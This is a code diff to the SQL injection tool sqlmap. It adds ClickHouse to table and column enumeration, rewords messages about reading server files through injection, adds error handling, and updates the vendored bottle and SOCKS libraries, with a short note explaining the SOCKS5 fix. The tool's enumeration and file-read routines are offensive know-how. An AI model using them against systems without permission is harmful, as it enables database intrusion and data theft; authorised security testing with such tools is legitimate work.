@@ -838,7 +838,7 @@ class Databases(object):
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
query = query.replace(" ORDER BY ", "%s ORDER BY " % condQuery)
field = None
elif Backend.isDbms(DBMS.MONETDB):
elif Backend.getIdentifiedDbms() in (DBMS.MONETDB, DBMS.CLICKHOUSE):
query = safeStringFormat(rootQuery.blind.query, (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db), index))
field = None
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE):
@@ -880,7 +880,7 @@ class Databases(object):
singleTimeWarnMessage(warnMsg)

if not onlyColNames:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db))
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper()))
@@ -239,7 +239,7 @@ class Entries(object):
entries = BigArray(_zip(*[entries[colName] for colName in colList]))
else:
query = rootQuery.inband.query % (colString, conf.db, tbl)
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO):
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0])
else:
query = rootQuery.inband.query % (colString, conf.db, tbl)
@@ -408,7 +408,7 @@ class Entries(object):
if column not in entries:
entries[column] = BigArray()

if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index)
@@ -222,13 +222,13 @@ class Filesystem(object):

if conf.direct or isStackingAvailable():
if isStackingAvailable():
debugMsg = "going to read the file with stacked query SQL "
debugMsg = "going to try to read the file with stacked query SQL "
debugMsg += "injection technique"
logger.debug(debugMsg)

fileContent = self.stackedReadFile(remoteFile)
elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to read the file with a non-stacked query "
debugMsg = "going to try to read the file with non-stacked query "
debugMsg += "SQL injection technique"
logger.debug(debugMsg)

14
sqlmap.py
@@ -436,6 +436,11 @@ def main():
logger.critical(errMsg)
raise SystemExit

elif any(_ in errMsg for _ in (": 9.9.9#",)):
errMsg = "LOL :)"
logger.critical(errMsg)
raise SystemExit

elif kb.get("dumpKeyboardInterrupt"):
raise SystemExit

@@ -457,7 +462,7 @@ def main():
dataToStdout(excMsg)
raise SystemExit

elif any(_ in excMsg for _ in ("ImportError", "ModuleNotFoundError", "<frozen", "Can't find file for module", "SAXReaderNotAvailable", "source code string cannot contain null bytes", "No module named", "tp_name field", "module 'sqlite3' has no attribute 'OperationalError'")):
elif any(_ in excMsg for _ in ("ImportError", "ModuleNotFoundError", "<frozen", "Can't find file for module", "SAXReaderNotAvailable", "<built-in function compile> returned NULL without setting an exception", "source code string cannot contain null bytes", "No module named", "tp_name field", "module 'sqlite3' has no attribute 'OperationalError'")):
errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip()
logger.critical(errMsg)
raise SystemExit
@@ -467,6 +472,11 @@ def main():
logger.critical(errMsg)
raise SystemExit

elif all(_ in excMsg for _ in ("FileNotFoundError: [Errno 2] No such file or directory", "cwd = os.getcwd()")):
errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip()
logger.critical(errMsg)
raise SystemExit

elif all(_ in excMsg for _ in ("PermissionError: [WinError 5]", "multiprocessing")):
errMsg = "there is a permission problem in running multiprocessing on this system. "
errMsg += "Please rerun with '--disable-multi'"
@@ -543,7 +553,7 @@ def main():
finally:
kb.threadContinue = False

if getDaysFromLastUpdate() > LAST_UPDATE_NAGGING_DAYS:
if (getDaysFromLastUpdate() or 0) > LAST_UPDATE_NAGGING_DAYS:
warnMsg = "your sqlmap version is outdated"
logger.warning(warnMsg)

80
thirdparty/bottle/bottle.py
vendored
@@ -69,12 +69,12 @@ if __name__ == '__main__':
# Imports and Python 2/3 unification ##########################################
###############################################################################

import base64, calendar, cgi, email.utils, functools, hmac, imp, itertools,\
import base64, calendar, cgi, email.utils, functools, hmac, itertools,\
mimetypes, os, re, tempfile, threading, time, warnings, weakref, hashlib

from types import FunctionType
from datetime import date as datedate, datetime, timedelta
from tempfile import TemporaryFile
from tempfile import NamedTemporaryFile
from traceback import format_exc, print_exc
from unicodedata import normalize

@@ -83,34 +83,6 @@ try:
except ImportError:
from json import dumps as json_dumps, loads as json_lds

# inspect.getargspec was removed in Python 3.6, use
# Signature-based version where we can (Python 3.3+)
try:
from inspect import signature
def getargspec(func):
params = signature(func).parameters
args, varargs, keywords, defaults = [], None, None, []
for name, param in params.items():
if param.kind == param.VAR_POSITIONAL:
varargs = name
elif param.kind == param.VAR_KEYWORD:
keywords = name
else:
args.append(name)
if param.default is not param.empty:
defaults.append(param.default)
return (args, varargs, keywords, tuple(defaults) or None)
except ImportError:
try:
from inspect import getfullargspec
def getargspec(func):
spec = getfullargspec(func)
kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs)
return kwargs, spec[1], spec[2], spec[3]
except ImportError:
from inspect import getargspec

py = sys.version_info
py3k = py.major > 2

@@ -123,9 +95,17 @@ if py3k:
urlunquote = functools.partial(urlunquote, encoding='latin1')
from http.cookies import SimpleCookie, Morsel, CookieError
from collections.abc import MutableMapping as DictMixin
from types import ModuleType as new_module
import pickle
from io import BytesIO
import configparser
# getfullargspec was deprecated in 3.5 and un-deprecated in 3.6
# getargspec was deprecated in 3.0 and removed in 3.11
from inspect import getfullargspec
def getargspec(func):
spec = getfullargspec(func)
kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs)
return kwargs, spec[1], spec[2], spec[3]

basestring = str
unicode = str
@@ -143,9 +123,12 @@ else: # 2.x
from Cookie import SimpleCookie, Morsel, CookieError
from itertools import imap
import cPickle as pickle
from imp import new_module
from StringIO import StringIO as BytesIO
import ConfigParser as configparser
from collections import MutableMapping as DictMixin
from inspect import getargspec

unicode = unicode
json_loads = json_lds
exec(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec'))
@@ -256,6 +239,7 @@ class lazy_attribute(object):
setattr(cls, self.__name__, value)
return value


###############################################################################
# Exceptions and Events #######################################################
###############################################################################
@@ -1353,7 +1337,7 @@ class BaseRequest(object):
body.write(part)
body_size += len(part)
if not is_temp_file and body_size > self.MEMFILE_MAX:
body, tmp = TemporaryFile(mode='w+b'), body
body, tmp = NamedTemporaryFile(mode='w+b'), body
body.write(tmp.getvalue())
del tmp
is_temp_file = True
@@ -2010,6 +1994,7 @@ class JSONPlugin(object):
dumps = self.json_dumps
if not self.json_dumps: return callback

@functools.wraps(callback)
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
@@ -2057,7 +2042,7 @@ class _ImportRedirect(object):
""" Create a virtual package that redirects imports (see PEP 302). """
self.name = name
self.impmask = impmask
self.module = sys.modules.setdefault(name, imp.new_module(name))
self.module = sys.modules.setdefault(name, new_module(name))
self.module.__dict__.update({
'__file__': __file__,
'__path__': [],
@@ -2066,10 +2051,15 @@ class _ImportRedirect(object):
})
sys.meta_path.append(self)

def find_spec(self, fullname, path, target=None):
if '.' not in fullname: return
if fullname.rsplit('.', 1)[0] != self.name: return
from importlib.util import spec_from_loader
return spec_from_loader(fullname, self)

def find_module(self, fullname, path=None):
if '.' not in fullname: return
packname = fullname.rsplit('.', 1)[0]
if packname != self.name: return
if fullname.rsplit('.', 1)[0] != self.name: return
return self

def load_module(self, fullname):
@@ -2825,18 +2815,15 @@ def redirect(url, code=None):
raise res


def _file_iter_range(fp, offset, bytes, maxread=1024 * 1024, close=False):
""" Yield chunks from a range in a file, optionally closing it at the end.
No chunk is bigger than maxread. """
def _rangeiter(fp, offset, limit, bufsize=1024 * 1024):
""" Yield chunks from a range in a file. """
fp.seek(offset)
while bytes > 0:
part = fp.read(min(bytes, maxread))
while limit > 0:
part = fp.read(min(limit, bufsize))
if not part:
break
bytes -= len(part)
limit -= len(part)
yield part
if close:
fp.close()


def static_file(filename, root,
@@ -2940,9 +2927,10 @@ def static_file(filename, root,
if not ranges:
return HTTPError(416, "Requested Range Not Satisfiable")
offset, end = ranges[0]
rlen = end - offset
headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end - 1, clen)
headers["Content-Length"] = str(end - offset)
if body: body = _file_iter_range(body, offset, end - offset, close=True)
headers["Content-Length"] = str(rlen)
if body: body = _closeiter(_rangeiter(body, offset, rlen), body.close)
return HTTPResponse(body, status=206, **headers)
return HTTPResponse(body, **headers)

@@ -3359,7 +3347,7 @@ class MeinheldServer(ServerAdapter):


class FapwsServer(ServerAdapter):
""" Extremely fast webserver using libev. See http://www.fapws.org/ """
""" Extremely fast webserver using libev. See https://github.com/william-os4y/fapws3 """

def run(self, handler): # pragma: no cover
depr(0, 13, "fapws3 is not maintained and support will be dropped.")
@@ -4276,7 +4264,7 @@ def view(tpl_name, **defaults):
tplvars.update(result)
return template(tpl_name, **tplvars)
elif result is None:
return template(tpl_name, defaults)
return template(tpl_name, **defaults)
return result

return wrapper

2
thirdparty/socks/socks.py
vendored
@@ -195,7 +195,7 @@ class socksocket(socket.socket):
elif chosenauth[1:2] == chr(0x02).encode():
# Okay, we need to perform a basic username/password
# authentication.
self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.__proxy[5])) + self.__proxy[5])
self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode())
authstat = self.__recvall(2)
if authstat[0:1] != chr(0x01).encode():
# Bad response
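The rewritten line makes every piece of the SOCKS5 username/password sub-negotiation packet a bytes object, since Python 3 refuses to concatenate str and bytes. A standalone sketch with made-up credentials (assuming ASCII values shorter than 128 bytes):

```python
username, password = "user", "secret"  # hypothetical proxy credentials

# version 0x01 of the sub-negotiation, then length-prefixed fields
packet = (chr(0x01).encode()
          + chr(len(username)).encode() + username.encode()
          + chr(len(password)).encode() + password.encode())

print(packet)  # b'\x01\x04user\x06secret'
```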